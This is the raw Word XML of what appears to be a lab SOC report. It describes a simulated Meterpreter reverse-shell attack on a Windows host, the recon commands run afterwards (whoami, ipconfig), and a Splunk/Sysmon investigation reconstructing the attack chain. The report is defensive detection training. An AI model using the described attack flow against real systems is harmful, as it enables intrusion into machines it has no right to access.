    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6F704365" w14:textId="7E6E794B">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Execution of Post‑Exploitation Commands on the Compromised Windows Machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="17145C44" w14:textId="64B3482F">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After obtaining the Meterpreter reverse shell successfully, I executed several post‑exploitation commands on the compromised Windows host to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validate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the level of access and confirm full command execution capability. The commands ran without any errors, and the results were returned correctly through the active Meterpreter session.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="787AE571" w14:textId="3AD02043">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The commands executed included:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="36F762FE" w14:textId="7289E324">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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whoami</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 to verify the current user context on the compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1CBBF359" w14:textId="402F7EF8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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ipconfig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to retrieve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network configuration details such as IP address, gateway, and DNS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="76B807F9" w14:textId="6EBBE2E9">
      <w:pPr>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4F54BF0C" wp14:anchorId="5FCA297B">
            <wp:extent cx="5829300" cy="3590925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5750201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5020104" name="Picture 575020104"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1588385853">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="3590925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="342BD63F" w14:textId="748F5A9D">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5. Investigating Attack in Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4424E606" w14:textId="1BB76097">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Splunk receives Sysmon logs showing:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2BF7CB43" w14:textId="30A0F23C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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File creation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="090229B6" w14:textId="496DDEBC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Process execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0121EA5F" w14:textId="062FA84F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Parent-child process chain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5454752B" w14:textId="73EDD0D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Network connection to the attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="197D3E74" w14:textId="1A42E1CA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Commands executed by the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1C20F838" w14:textId="48F41C31">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Typical investigation search:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4702AECD" w14:textId="7D5B0A5E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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EventID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1 (malicious file execution)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0C8BA224" w14:textId="528B5C2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Tracking the corresponding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ProcessGUID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="03AE92B7" w14:textId="769AAACA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Viewing process tree and command line fields</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="6EF9BB9B" w14:textId="47771730">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="72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60FD3CA5" w14:textId="2F6EAD13">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="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6. Outcome</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4F2B5193" w14:textId="36691067">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The reverse shell simulation was successful and Splunk confirmed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1ED7EF55" w14:textId="1CF3670D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Malicious file execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="495A6430" w14:textId="23E38A06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Process relationships</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="08D6D9D0" w14:textId="5FDF396C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Reverse shell network activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4BD3D427" w14:textId="656E50B8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Meterpreter command execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7B4795BA" w14:textId="7C643BCA">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This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validates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the SOC’s capability to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detect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log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and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analyze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reverse‑shell‑based attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5A73E932" w14:textId="10A7DB96">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="322" w:beforeAutospacing="off" w:after="322"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Reverse Shell Attack – Detailed SOC Investigation Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1AD04A68" w14:textId="49A2FB46">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1. Initial Execution – Suspicious Process Creation (Sysmon Event ID 1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="61AFA30D" w14:textId="3064E3D2">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investigation began by reviewing Sysmon Event ID 1, which revealed that a suspicious executable was launched from a user-accessible directory. The parent process was identified as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explorer.exe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confirming that the payload was executed through normal user interaction. The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CommandLine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field exposed the full path of the malicious file, and the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ProcessGUID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was extracted to correlate all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subsequent</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activity tied to the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5F671239" w14:textId="7C594D26">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14B073F4" wp14:anchorId="4DFD1C10">
            <wp:extent cx="5943600" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="534626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462666" name="Picture 53462666"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId447233832">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5B08880B" w14:textId="52D003FD">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2. File System Activity – File Creation (Sysmon Event ID 11)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0C56D5B1" w14:textId="175E4D37">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Sysmon Event ID 11 showed several file creation events occurring shortly after the payload execution. These files were placed in temporary or user directories with no legitimate processes responsible for them,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indicating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that the attacker prepared the environment for post-exploitation. This activity aligned with the typical staging behavior of reverse-shell payloads.</w:t>
      </w:r>
      <w:r w:rsidR="282F2B94">
        <w:drawing>
          <wp:inline wp14:editId="59AE9566" wp14:anchorId="0E66A98E">
            <wp:extent cx="5943600" cy="3390900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11519661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1966161" name="Picture 1151966161"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1913929811">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3390900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="69CCBEF9" w14:textId="143F3F73">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3. Network Connection – Reverse Shell Communication (Sysmon Event ID 3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5C290E9E" w14:textId="46EA2654">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Sysmon Event ID 3 provided critical evidence of the reverse-shell connection.</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compromised host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initiated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an outbound TCP connection from the malicious process to the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attacker</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machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="32073B2D" w14:textId="0F2095A8">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Key findings from Event ID 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1AF2B3D0" w14:textId="7D1184C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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The destination IP matched the Kali attack machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="2CEE2B69" w14:textId="2A95C894">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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destination port matched the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MSFvenom</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reverse_tcp</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payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="06627DD1" w14:textId="25A70C72">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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connection state was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ESTABLISHED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proving that an active remote session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6A00C43B" w14:textId="3AA615BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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source process was the same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ProcessGUID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tied to the malicious payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="0CD1D7B6" w14:textId="61A490A4">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="72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29D6A59E" w14:textId="334D63CD">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This event is one of the strongest confirmations that a reverse shell was successfully formed and that interactive attacker communication took place.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="109DEDC4" w14:textId="0707D8DB">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2899D2AB" wp14:anchorId="749C1FEF">
            <wp:extent cx="5943600" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10659363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65936303" name="Picture 1065936303"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1585051441">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p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7BED20C4" w14:textId="67BB72BA">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4. Alternate Data Stream Activity – Hidden File Streams (Sysmon Event ID 15)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="0599DABA" w14:textId="1DBD9913">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Analysis of Event ID 15 revealed the creation of an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Alternate Data Stream (ADS)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associated with the malicious process. ADS creation is commonly used by attackers to hide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additional</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scripts or encoded content. The stream hash allowed correlation with the same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ProcessGUID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from the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initial</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payload execution, further connecting this action to the reverse-shell activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="50C8B3F9" w14:textId="65BD1A31">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796B1680" wp14:anchorId="0D0EC2A3">
            <wp:extent cx="5943600" cy="2257425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16482579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8257955" name="Picture 1648257955"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId815839058">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2257425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="657D93E0" w14:textId="7FE0E373">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p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="26166B8A" w14:textId="335A2468">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5. DNS Activity – Suspicious External Lookup (Sysmon Event ID 22)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7B12F9CF" w14:textId="3ED1E780">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Event ID 22 showed that the compromised host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initiated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 DNS lookup to a suspicious external domain around the exact time of the attack. The domain was not associated with any internal application or approved software. This lookup strongly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indicated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an attempt to connect to an attacker-controlled server as part of the reverse-shell communication process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="23286560" w14:textId="3744D0E1">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028A64C7" wp14:anchorId="78E222D5">
            <wp:extent cx="5943600" cy="3476625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1298149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9814946" name="Picture 129814946"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId334532171">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3476625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5E3E57AD" w14:textId="55B2B4FF">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6. Post-Exploitation Activity – Interactive Commands Executed by the Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="68FE9AF8" w14:textId="103D7C2E">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After the reverse shell was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established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several interactive commands were successfully executed on the compromised machine. These commands were visible through Sysmon logs and included:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1C495B6C" w14:textId="111075DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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whoami</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 confirmed the active user context</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="19DA45B9" w14:textId="51680969">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>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ipconfig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 gathered network interface details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="12C216DF" w14:textId="7A59E36B">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="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These commands matched known reconnaissance techniques used during early post-exploitation phases and aligned with MITRE ATT&amp;CK techniques such as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System Information Discovery, Network Reconnaissance, and Process Discovery</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2B368556" w14:textId="5CFD6BEF">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>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282F2B94">
        <w:drawing>
          <wp:inline wp14:editId="62524372" wp14:anchorId="09CC6B46">
            <wp:extent cx="5943600" cy="3009900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5335818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3581853" name="Picture 533581853"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1997457509">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3009900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7BD30C0B" w14:textId="3B799DA9">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7. Timeline Correlation Across Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="046A50A5" w14:textId="32A5E885">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By correlating Event IDs 1, 3, 11, 15, and 22, along with the observed command execution, a complete timeline of the attack was reconstructed.</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sequence clearly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demonstrated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p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="29F0D2F2" w14:textId="10726653">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Initial payload execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7813CA4D" w14:textId="5730AC92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Creation of supporting files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="23FA0418" w14:textId="6878985D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Hidden data stream activity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="3100A116" w14:textId="2CE0BC04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Registry modifications</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4E699F96" w14:textId="5D08DD9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Outbound connection to attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="092BBBAD" w14:textId="04CFD9A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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External DNS resolution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="5ABDBA84" w14:textId="19964D5D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="136"/>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Successful remote interactive control of the host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="614DCCE1" w14:textId="585078BD">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This multi-event correlation provided conclusive visibility over the entire attack chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="7B888AA1" w14:textId="6D376A96">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8. Process Chain Analysis – Suspicious Parent/Child Process Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="05A27D9C" w14:textId="379EDEEF">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During the investigation, the evidence appeared in the Sysmon logs showing an abnormal process-execution chain that further strengthens the confirmation of malicious activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="390182AD" w14:textId="4C9D11D3">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a. Explorer.exe Downloaded the Initial File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="6BCD5946" w14:textId="56733533">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Logs showed that the file named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learn.exe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(or learn-based executable) was downloaded directly via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explorer.exe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indicating</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direct user interaction such as:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="26297B95" w14:textId="428AAEB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Downloading the file from a browser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="003B80DB" w14:textId="0157AB53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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Copying it from a network share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="577F1177" w14:textId="007EE307">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="137"/>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Receiving it through removable media</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="548A1A36" w14:textId="26AE9762">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This step clearly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represents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initial</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delivery stage of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1637F4AD" w14:textId="48A0013D">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b. learn.exe Spawned CMD.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="4131962A" w14:textId="3C93816D">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Immediately after the download event, Sysmon Event ID 1 showed that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="291AB0DC" w14:textId="5215B1BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13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CMD.exe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was launched</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1C1D97D8" w14:textId="63D19E1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>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ParentImage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was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learn.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="282F2B94" w:rsidP="166587AE" w:rsidRDefault="282F2B94" w14:paraId="1DB8FA50" w14:textId="52A47AAD">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This is extremely suspicious because legitimate installers rarely spawn raw command shells without user prompting. This behavior strongly aligns with malware staging or reverse shell bootstrapping.</w:t>
